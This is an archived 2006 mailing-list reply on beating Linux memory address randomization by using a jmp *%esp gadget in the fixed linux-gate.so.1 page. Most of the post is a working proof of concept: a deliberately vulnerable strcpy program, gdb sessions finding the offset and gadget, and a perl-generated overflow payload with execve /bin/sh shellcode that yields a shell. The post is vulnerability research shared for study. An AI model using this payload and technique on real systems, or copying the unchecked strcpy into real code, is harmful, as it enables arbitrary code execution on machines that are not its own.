Vulnerability Development mailing list archives
Re: Beating memory address randomization (secuirty) features in Unix/Linux
From: xgc () gotfault net
Date: 29 Mar 2006 20:02:38 -0000
To bypass VA Space Randomization on Linux: [~/tmp] $ more stack.c #include <stdio.h> #include <stdlib.h> #include <string.h> int main(int argc, char **argv) { char buf[256]; strcpy(buf, argv[1]); return 1; } [~/tmp] $ gcc -o stack stack.c [~/tmp] $ ldd stack linux-gate.so.1 => (0xffffe000) libc.so.6 => /lib/tls/libc.so.6 (0xb7e32000) /lib/ld-linux.so.2 (0xb7f70000) [~/tmp] $ ldd stack linux-gate.so.1 => (0xffffe000) libc.so.6 => /lib/tls/libc.so.6 (0xb7e72000) /lib/ld-linux.so.2 (0xb7fb0000) [~/tmp] $ As you can see linux-gate.so.1 is linked on stack program and its address isn't randomized. In this range address there is a lot of instructions mainly JMP *%ESP which can be used to points to stack and execute arbitraty code. [~/tmp] $ gdb ./stack -q Using host libthread_db library "/lib/tls/libthread_db.so.1". (gdb) break main Breakpoint 1 at 0x80483a1 (gdb) run Starting program: /home/xgc/tmp/stack Breakpoint 1, 0x080483a1 in main () (gdb) x/i 0xffffe75f 0xffffe75f: jmp *%esp (gdb) A Proof Of Concept will be showed below: [~/tmp] $ !gdb gdb ./stack -q Using host libthread_db library "/lib/tls/libthread_db.so.1". (gdb) x/i main+3 0x804839b <main+3>: sub $0x108,%esp (gdb) printf "%d\n", 0x108 264 (gdb) run `perl -e 'print "A"x260,"BBBB"'` Starting program: /home/xgc/tmp/stack `perl -e 'print "A"x260,"BBBB"'` Program received signal SIGSEGV, Segmentation fault. 0x42424242 in ?? () (gdb) x/i 0xffffe75f 0xffffe75f: jmp *%esp (gdb) run `perl -e 'print "A"x260,"\x5f\xe7\xff\xff","\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'` The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/xgc/tmp/stack `perl -e 'print "A"x260,"\x5f\xe7\xff\xff","\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'` sh-3.1$ uname -na Linux localhost 2.6.12.5-vs2.0 #1 SMP Tue Aug 23 16:21:23 CEST 2005 i686 GNU/Linux sh-3.1$ At EIP we set the address which jumps to ESP. It then will looks to next instructions, where exists shellcode. "Does anyone know if there are any articles related to this on the web?" Yes there is a paper from izik on: http://www.tty64.org/doc/smackthestack.txt - dx
Current thread:
- Beating memory address randomization (secuirty) features in Unix/Linux hd12787 (Mar 28)
- Re: Beating memory address randomization (secuirty) features in Unix/Linux Yves Younan (Mar 31)
- <Possible follow-ups>
- Re: Beating memory address randomization (secuirty) features in Unix/Linux xgc (Mar 31)
- Re: Beating memory address randomization (secuirty) features in Unix/Linux Don Bailey (Mar 31)
- Re: Beating memory address randomization (secuirty) features in Unix/Linux john (Mar 31)
- Re: Beating memory address randomization (secuirty) features in Unix/Linux Don Bailey (Mar 31)